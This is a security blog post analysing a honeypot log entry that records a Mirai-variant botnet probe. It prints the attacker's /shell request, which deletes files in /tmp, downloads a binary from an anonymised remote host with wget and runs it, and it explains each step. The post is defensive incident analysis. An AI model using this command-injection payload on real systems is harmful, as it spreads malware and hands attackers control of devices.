Insights > Blog

Investigating a Cyber Attack: Step by Step

Author: Fernando Amatte, Director of Red Team Services, Latin America

As a cybersecurity professional, I have my own laboratory with some virtual equipment acquired around the world. The goal is simply to research and conduct tests to identify new attacks, solutions and possibilities.

When the equipment is not being used, it continues to function as “honeypots”. Honeypots are computers left on with the purpose to be attacked. The computer collects records, that is, access attempts also known as log. Again, the goal is future research and analysis.

This weekend, I found a very curious fact. Analyzing the logs of a web server I identified the following line. The IP addresses are anonymized.

77.xxx.xxx.xxxx – – [27/Jun/2020:22:42:32 +0000] “GET /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1” 404 488 “-” “Hello, world”Who?

IP address of the person making the connection: 77.xxx.xxx.xxxx

 

Parsing the Log

When?
Date and time: 27 / Jun / 2020: 22: 42: 32 +0000

What?
What were you looking for or accessing? /shell ?cd+/tmp;rm+rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy. jaws

Answer
Response code (right or wrong)? 404

Browser
What browser were you using for this access? Hello, world

The “What?” and “Browser” stand out in this line. This is because it is unusual to find legitimate access to the log lines containing Linux commands. In addition, the last field should be the browser identification (Mozilla, Chrome, etc.) but the text “Hello, world” appears.

 

Analyzing the Command

 

Command Function
cd + / tmp
Go to the temporary directory
rm + -rf + * Delete all content from this location
wget + 185.yyy.yyy.yyy / bins / UnHAnaAW.x86 Go to 185.yyy.yyy.yyy and download the files
chmod + 777 + / tmp / UnHAnaAW.x86 Change the permissions on the UnHAnaAW.x86 file
sh + / tmp / UnHAnaAW.x86 + w00dy.jaws Run the UnHAnaAW.x86 Execute file by passing as a parameter the text “w00dy.jaws”

 

The “What” description above shows that the attacker would be able to execute commands on the victims’ machines. This means that he could have full access to the equipment and control it as he wishes.

Analyzing the location where the download should have been performed, we found a repository with binary files for different platforms or equipment, as shown in the figure below:

The finding that this is a malicious action also comes from consulting the file UnHAnaAW.x86 on Virustotal. The website shows the identification of the file as malicious by 40 different Anti-Malware programs.

Many of these Anti-Malwares have categorized this file, as a variation of MIRAI, a malware or botnet that has been causing impacts since 2016. In this case, after checking figures 2 and 3, we identify that the file was created on 09-June-2020. This same file was sent to Virustotal the next day, 10-June-2020.

We conclude, therefore, that this file is new and different from the 2016 version. It may contain more harmful features, but is still a part of the same family seen since 2016.

When searching for the IP address that made the access, a Mikrotik router was found.

So what does all this mean?
 
  • The Mikrotik router is hacked and looking for new victims for the botnet
  • It is difficult and perhaps impossible to install antivirus software on some types of equipment
  • There are several infected machines around the world
  • We do not know:
    • How these machines will be used
    • Who will be the victims
    • When the next mass attack will happen

Conclusion

Right now, the devices in your home may be part of a computer network that was previously hacked and trying to hack into other devices. This can have an unimaginable impact and cause unknown losses to companies and individuals. Therefore, it is worth mentioning the need to update domestic devices in general.

This investigation was superficial. Therefore, it is not known how many machines there are on this Botnet. Regardless, any malicious machine is always a big risk. For more than a year, different versions of this software have been scouring the internet for new victims, and we have no way of predicting when a new mass attack will happen.

If you’re a regular technology user, update all of your devices. Help us in this battle against cyber security attacks and invasions. In the case of cybersecurity professionals, review your logs for anomalies and keep all systems and devices up to date as well as your security policy up to date.

Did you enjoy this blog article? Comment below with your feedback.

2 Comments

  1. Maria Sanchez

    Excellent write-up! Thanks!

    Reply
  2. Ulrich Raape

    Very helpful! I just encountered similar log entries and found this article. Thank you!

    Reply

Submit a Comment

Your email address will not be published. Required fields are marked *

GET EMAIL UPDATES

Information Security Maturity Self-Assessment Survey

Learn More

•  Whitepapers
•  E-books
•  Checklists
•  Self-Assessments
•  Webcasts
•  Infographics